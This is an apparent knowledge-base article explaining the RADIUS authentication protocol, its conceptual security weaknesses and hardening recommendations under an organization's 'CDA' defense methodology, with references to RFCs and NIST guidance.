# RADIUS Authentication
Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that provides centralized Authentication, Authorization, and Accounting (AAA) management for users connecting to network services. Originally designed for dial-up access in the 1990s, RADIUS has evolved into the dominant protocol for enterprise network access control, governing connections to wireless networks, VPNs, network switches, and remote access systems.
RADIUS addresses a fundamental scaling problem in network security: how to maintain consistent access control across hundreds or thousands of network access points without duplicating user databases on every device. Before RADIUS, network administrators had to manually configure user accounts on each access device (modems, switches, wireless access points). This approach became unworkable as networks grew larger and more complex. RADIUS centralizes this function by placing all user authentication data on dedicated RADIUS servers while allowing network access devices to remain lightweight clients.
The protocol operates as the enforcement engine for network access policies in most enterprise environments. When a user attempts to connect to a corporate Wi-Fi network, authenticate to a VPN gateway, or log into a network switch, RADIUS determines whether that connection is authorized. It integrates with existing identity systems like Active Directory, LDAP directories, and certificate authorities, making it the translation layer between network infrastructure and enterprise identity management.
RADIUS fills a critical gap in network security architecture. While firewalls control traffic flow and intrusion detection systems monitor network behavior, RADIUS controls who gets network access in the first place. This positioning makes RADIUS configuration a primary attack vector for lateral movement and privilege escalation, since compromising RADIUS authentication often grants an attacker legitimate network credentials.
RADIUS implements a client-server architecture where network access servers (NAS) function as RADIUS clients. The NAS devices include wireless access points, VPN concentrators, network switches with 802.1X port authentication, and remote access servers. These clients forward authentication requests to centralized RADIUS servers, which maintain user databases and authentication policies.
The authentication process begins when a user initiates a network connection. The NAS captures the user's credentials (username and password, certificate, or other authentication factors) and packages them into a RADIUS Access-Request packet. This packet contains the username, encrypted password, NAS identifier, and session information. The NAS sends this packet to the configured RADIUS server over UDP port 1812.
The RADIUS server receives the Access-Request and validates the credentials against its user database. This database can be local to the RADIUS server or integrated with external systems like Active Directory through LDAP, Kerberos, or other authentication mechanisms. Based on the validation result and configured policies, the server responds with one of three packet types: Access-Accept (authentication successful), Access-Reject (authentication failed), or Access-Challenge (additional information required, such as a second authentication factor).
If the server sends an Access-Accept packet, it can include RADIUS attributes that define the user's authorized network access. These attributes control session duration, bandwidth limits, VLAN assignment, firewall rules, and other network policies. For wireless connections, RADIUS attributes might specify which SSID the user can access or what encryption keys to use. For VPN connections, attributes might define which internal networks are reachable or what IP address to assign.
The shared secret is the cryptographic foundation of RADIUS security. Each RADIUS client (NAS) and server pair shares a secret key configured on both devices. This shared secret serves two functions: message authentication and password encryption. RADIUS uses the shared secret to compute an MD5 hash over each packet, ensuring message integrity and preventing unauthorized devices from sending forged authentication requests. The user password field is encrypted using MD5 with the shared secret and packet authenticator as inputs.
RADIUS accounting operates parallel to authentication using UDP port 1813. When a user session begins, the NAS sends an Accounting-Start packet to the RADIUS server with session details. During the session, the NAS may send Interim-Update packets with usage statistics. When the session ends, the NAS sends an Accounting-Stop packet with final session data including duration, bytes transferred, and disconnect reason. This accounting data supports billing, compliance reporting, and security monitoring.
Extensible Authentication Protocol (EAP) integration extends RADIUS beyond simple username-password authentication. EAP defines a framework for multiple authentication methods, including EAP-TLS (certificate-based), EAP-PEAP (protected EAP), and EAP-TTLS (tunneled TLS). When EAP is used, the RADIUS server acts as a pass-through, forwarding EAP messages between the client device and an EAP authentication server. This allows RADIUS infrastructure to support smart card authentication, biometric systems, and other advanced authentication mechanisms.
RADIUS proxy configurations enable distributed authentication across multiple organizations or geographic regions. A RADIUS proxy server receives authentication requests and forwards them to appropriate backend RADIUS servers based on realm information in the username (such as user@company.com). This capability supports roaming access agreements between organizations and simplifies authentication in large, geographically distributed enterprises.
High availability RADIUS deployments typically implement multiple RADIUS servers in primary-secondary or load-balanced configurations. NAS devices are configured with multiple RADIUS server addresses and automatically fail over if the primary server becomes unreachable. RADIUS server clusters can share user databases and configuration to ensure consistent authentication policies across all servers.
RADIUS authentication controls the network access chokepoint that determines whether unauthorized users can reach enterprise resources. When RADIUS fails or is compromised, the impact cascades across all network access mechanisms: wireless networks, VPN connections, administrative access to switches and routers, and 802.1X port authentication on wired networks. This broad scope makes RADIUS availability and security critical to overall enterprise security posture.
The protocol's cryptographic weaknesses create significant attack surface. RADIUS password encryption relies on MD5 hashing, which is cryptographically obsolete and vulnerable to collision attacks and rainbow table lookups. While the password field is encrypted, other attributes like usernames are transmitted in plaintext. Shared secrets are often weak or reused across multiple NAS devices, amplifying the impact of a single compromise. If an attacker captures RADIUS traffic and cracks the shared secret, they can decrypt password fields and potentially replay authentication requests.
Man-in-the-middle attacks against RADIUS are particularly dangerous because the protocol lacks built-in mechanisms to verify server authenticity. An attacker who can intercept RADIUS traffic can potentially capture credentials, inject malicious responses, or redirect authentication requests to rogue servers. This vulnerability is especially concerning for wireless networks where traffic interception is simpler.
Shared secret management represents the most common RADIUS security failure point. Organizations frequently use the same shared secret across hundreds of access points and switches, creating a single point of failure. Default or weak shared secrets are common, particularly on wireless access points where configuration complexity leads to shortcuts. When shared secrets are compromised, attackers can impersonate legitimate NAS devices and capture authentication credentials from legitimate users.
RADIUS server compromise has far-reaching consequences because these servers often integrate with core enterprise identity systems. A compromised RADIUS server can potentially access Active Directory credentials, certificate stores, and user databases. The centralized nature that makes RADIUS operationally efficient also makes it a high-value target for attackers seeking to establish persistent network access.
Accounting data stored on RADIUS servers represents both a security asset and a privacy risk. Detailed logs of user connections, session durations, and data usage patterns can support incident response and forensic investigations. However, this same data can reveal sensitive information about user behavior, location patterns, and business operations if improperly secured or accessed by unauthorized parties.
RADIUS authentication falls within both the Identity Access and Trust (IAT) and Systems Prevention and Hardening (SPH) domains of the Persistent Defense Methodology. The protocol's dual role as an identity verification mechanism and a network access control point requires coordinated analysis across both domains to achieve comprehensive security.
From the IAT perspective, RADIUS represents a critical identity federation chokepoint where enterprise authentication systems interface with network infrastructure. CDA methodology emphasizes that RADIUS servers should never be trusted to maintain authoritative identity data, instead operating as verification proxies that forward authentication decisions to authoritative identity stores. This approach aligns with Zero Possession Architecture principles where RADIUS servers possess authentication credentials only temporarily during the verification process.
SPH domain analysis focuses on RADIUS as network infrastructure that must be hardened against direct attack and configuration exploitation. CDA campaigns systematically examine shared secret strength, rotation policies, and distribution mechanisms. Unlike conventional approaches that treat shared secrets as long-lived configuration parameters, CDA methodology advocates for programmatic secret rotation with integration into certificate management systems where possible.
CDA's approach to RADIUS differs significantly from traditional network security thinking in its rejection of trust-based configuration. Conventional RADIUS deployments often rely on network segmentation and access control lists to protect RADIUS traffic, operating on the assumption that internal network communication is inherently secure. CDA methodology applies "trust nothing" principles by requiring encrypted transport for all RADIUS communication, typically through IPsec tunnels or RadSec (RADIUS over TLS) implementations.
The "possess nothing" principle drives CDA RADIUS architecture toward stateless authentication where RADIUS servers do not maintain persistent session data or user credential caches. This approach reduces the attack surface associated with RADIUS server compromise and simplifies the security boundary analysis required for C-BUILD campaigns.
CDA methodology treats RADIUS accounting data as operational intelligence that must be verified rather than trusted. Conventional approaches often accept RADIUS accounting logs as authoritative records of network access and user behavior. CDA analysis correlates RADIUS accounting with independent data sources like DHCP logs, wireless association events, and network flow monitoring to verify the integrity of access control decisions.
During C-BUILD campaigns, CDA operators evaluate RADIUS configurations through infrastructure enumeration and policy analysis. This examination identifies misconfigurations like weak shared secrets, inadequate EAP method selection, and improper integration with backend authentication systems. The analysis extends beyond RADIUS servers themselves to include NAS device configurations, network path security, and integration touchpoints with enterprise identity systems.
• RADIUS centralizes network access authentication but creates a high-value attack target requiring robust cryptographic protection and careful shared secret management • MD5-based password encryption in RADIUS is cryptographically weak, making strong shared secrets and encrypted transport (IPsec or RadSec) essential for security • EAP integration enables advanced authentication methods like certificate-based EAP-TLS, which should be preferred over password-based authentication where possible • RADIUS accounting data provides valuable security monitoring capabilities but must be correlated with independent sources to verify integrity and detect compromise • CDA methodology requires stateless RADIUS architecture with programmatic secret rotation and encrypted transport to align with Zero Possession Architecture principles
• 802.1X Network Access Control • Active Directory Integration Security • Certificate-Based Authentication • Enterprise Wireless Security Architecture • Network Access Control (NAC) Systems
• Rigney, C., et al. "Remote Authentication Dial In User Service (RADIUS)." RFC 2865, Internet Engineering Task Force, 2000. • National Institute of Standards and Technology. "Guidelines for the Selection, Configuration, and Use of Transport Layer Security (TLS) Implementations." NIST SP 800-52 Rev. 2, 2019. • Aboba, B., et al. "Extensible Authentication Protocol (EAP)." RFC 3748, Internet Engineering Task Force, 2004. • SANS Institute. "Securing Wireless LANs: A SANS Whitepaper." SANS Reading Room, 2019.